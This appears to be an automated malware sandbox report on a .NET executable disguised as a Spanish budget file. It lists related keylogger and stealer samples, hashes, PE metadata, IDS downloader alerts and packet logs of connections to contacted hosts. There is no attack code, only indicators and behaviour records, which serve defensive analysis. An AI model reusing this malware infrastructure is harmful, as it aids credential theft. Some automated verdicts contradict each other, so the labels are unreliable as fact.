                                                                                            rCommercialoffer_Technicaloffer_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 193.122.130.0
                                                                                            PG567777878-H677889978-6G89O9I4567778.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 158.101.44.242
                                                                                            INVOICE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                            • 158.101.44.242
                                                                                            api.telegram.orgPO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRUPO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                            • 149.154.167.99
                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                            • 149.154.167.99
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.99
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            CLOUDFLARENETUS.gov.ua.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.142.245
                                                                                            Gun Ici Cek Statu Listesi.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 188.114.97.3
                                                                                            18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                            • 188.114.97.3
                                                                                            http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                            • 104.17.25.14
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            .gov.ua.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 104.17.24.14
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                                            • 188.114.97.3
                                                                                            Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.96.3
                                                                                            http://archzine.netGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            UTMEMUSPurchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 132.226.247.73
                                                                                            rCommercialoffer_Technicaloffer_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            54328bd36c14bd82ddaa0c04b25ed9adGun Ici Cek Statu Listesi.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 188.114.97.3
                                                                                            PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            rCommercialoffer_Technicaloffer_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            PG567777878-H677889978-6G89O9I4567778.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            INVOICE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            3b5074b1b5d032e5620f69f9f700ff0ePO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 149.154.167.220
                                                                                            I43xo3KKfS.exeGet hashmaliciousStealcBrowse
                                                                                            • 149.154.167.220
                                                                                            http://luckywinsweep.com/4tTAnN1826Wdfo84jjvakjqbux636KVMMHSLZEESXXFW54756LTNO308c9Get hashmaliciousPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            http://luckywinsweep.com/4HSvRF1826gInt84duwrkafbng636FPJGMZWGTSQLQDN54756JUOR308k9Get hashmaliciousPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 149.154.167.220
                                                                                            asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                                            • 149.154.167.220
                                                                                            nOrden_de_Compra___0001245.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.34331486778365
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.682544901702346
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            File name:PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            File size:815'104 bytes
                                                                                            MD5:4cf66de9bfdf5bb65b4151f456db83df
                                                                                            SHA1:8245fc47d7d1833882b90bbd1fe99d13b2335929
                                                                                            SHA256:b07790927beaf1cc2d81cf76f0081c7c264c3133fe71437ca4bd26e220800d43
                                                                                            SHA512:40a7727ee0786ab38fcedb5d0795e1524bba27e375fe0a756541e39412428b41a78674a546e492e388d3d0c69be75c405a9c4b1fde8fc9c21a08ddb702f8ce5d
                                                                                            SSDEEP:24576:HwZRZ2F+K76bdAO5ZNWHX0xVgDJVqtjd:QN2gK7AZNW30xGixd
                                                                                            TLSH:F905BED03A767B1ACEB54AB49529DD7483B52D687010FAE65EDC3BC735AC310AE08F42
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0..f..........Z.... ........@.. ....................................@................................
                                                                                            Icon Hash:90cececece8e8eb0
                                                                                            Entrypoint:0x4c855a
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x67231B9C [Thu Oct 31 05:54:36 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            push ebx
                                                                                            add byte ptr [ecx+00h], bh
                                                                                            jnc 00007F5914E250D2h
                                                                                            je 00007F5914E250D2h
                                                                                            add byte ptr [ebp+00h], ch
                                                                                            add byte ptr [ecx+00h], al
                                                                                            arpl word ptr [eax], ax
                                                                                            je 00007F5914E250D2h
                                                                                            imul eax, dword ptr [eax], 00610076h
                                                                                            je 00007F5914E250D2h
                                                                                            outsd
                                                                                            add byte ptr [edx+00h], dh
                                                                                            add dword ptr [eax], eax
                                                                                            add byte ptr [eax], al
                                                                                            add al, byte ptr [eax]
                                                                                            add byte ptr [eax], al
                                                                                            add eax, dword ptr [eax]
                                                                                            add byte ptr [eax], al
                                                                                            add al, 00h
                                                                                            add byte ptr [eax], al
                                                                                            add eax, 00000000h
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc85060x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x5ac.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xc51880x54.text
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000xc65980xc660009d38b5a75adb2b113f8a2a795896acdFalse0.8534590126811594data7.689072386621162IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xca0000x5ac0x6005c000ee4b459d000b8a1a21a06a8e514False0.421875data4.084309782578386IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xcc0000xc0x2001005019e23281330f7b77527569764faFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_VERSION0xca0900x31cdata0.4321608040201005
                                                                                            RT_MANIFEST0xca3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-10-31T10:35:17.072079+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149708132.226.247.7380TCP
                                                                                            2024-10-31T10:35:18.353340+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149708132.226.247.7380TCP
                                                                                            2024-10-31T10:35:19.059975+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1149780188.114.97.3443TCP
                                                                                            2024-10-31T10:35:19.946064+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149786132.226.247.7380TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 31, 2024 10:35:02.765862942 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:02.770754099 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:02.770982981 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:02.771111965 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:02.776087999 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:12.773505926 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:12.778711081 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:13.087740898 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:13.697173119 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:13.828908920 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:13.828936100 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:13.828979969 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:13.828979969 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:13.829416990 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:13.829467058 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:13.837055922 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:13.838092089 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:13.839642048 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:17.018172026 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:17.072078943 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:17.151957989 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:17.152031898 CET44349774188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:17.152170897 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:17.202997923 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:17.203028917 CET44349774188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:17.823951006 CET44349774188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:17.824074984 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:17.828984976 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:17.829009056 CET44349774188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:17.829369068 CET44349774188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:17.868972063 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:17.897666931 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:17.943341970 CET44349774188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:18.035412073 CET44349774188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:18.035516977 CET44349774188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:18.035604000 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:18.041712999 CET49774443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:18.046241999 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:18.051173925 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:18.300370932 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:18.303126097 CET49780443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:18.303169012 CET44349780188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:18.303354979 CET49780443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:18.303622007 CET49780443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:18.303637981 CET44349780188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:18.353339911 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:18.906969070 CET44349780188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:18.924645901 CET49780443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:18.924669981 CET44349780188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.059994936 CET44349780188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.060098886 CET44349780188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.060187101 CET49780443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:19.060724020 CET49780443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:19.064070940 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:19.065198898 CET4978680192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:19.069962025 CET8049708132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.070034027 CET4970880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:19.070161104 CET8049786132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.070234060 CET4978680192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:19.070328951 CET4978680192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:19.075282097 CET8049786132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.945801973 CET8049786132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.946063995 CET4978680192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:19.947233915 CET49792443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:19.947282076 CET44349792188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.947354078 CET49792443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:19.947592974 CET49792443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:19.947613001 CET44349792188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.952889919 CET8049786132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:19.952946901 CET4978680192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:20.561954975 CET44349792188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:20.565519094 CET49792443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:20.565546989 CET44349792188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:20.705152035 CET44349792188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:20.705245018 CET44349792188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:20.705426931 CET49792443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:20.705816984 CET49792443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:20.710153103 CET4979880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:20.715337992 CET8049798132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:20.715410948 CET4979880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:20.715481997 CET4979880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:20.722007036 CET8049798132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:22.567306042 CET8049798132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:22.568870068 CET49809443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:22.568928957 CET44349809188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:22.569010973 CET49809443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:22.569281101 CET49809443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:22.569293976 CET44349809188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:22.619052887 CET4979880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:23.180325031 CET44349809188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:23.182105064 CET49809443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:23.182120085 CET44349809188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:23.321930885 CET44349809188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:23.322040081 CET44349809188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:23.322084904 CET49809443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:23.322591066 CET49809443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:23.329277992 CET4979880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:23.331554890 CET4981580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:23.334665060 CET8049798132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:23.334742069 CET4979880192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:23.336342096 CET8049815132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:23.336435080 CET4981580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:23.336566925 CET4981580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:23.341356039 CET8049815132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.189604044 CET8049815132.226.247.73192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.191029072 CET49819443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:24.191050053 CET44349819188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.191114902 CET49819443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:24.191359997 CET49819443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:24.191370010 CET44349819188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.243940115 CET4981580192.168.2.11132.226.247.73
                                                                                            Oct 31, 2024 10:35:24.801070929 CET44349819188.114.97.3192.168.2.11
                                                                                            Oct 31, 2024 10:35:24.802839994 CET49819443192.168.2.11188.114.97.3
                                                                                            Oct 31, 2024 10:35:24.802880049 CET44349819188.114.97.3192.168.2.11
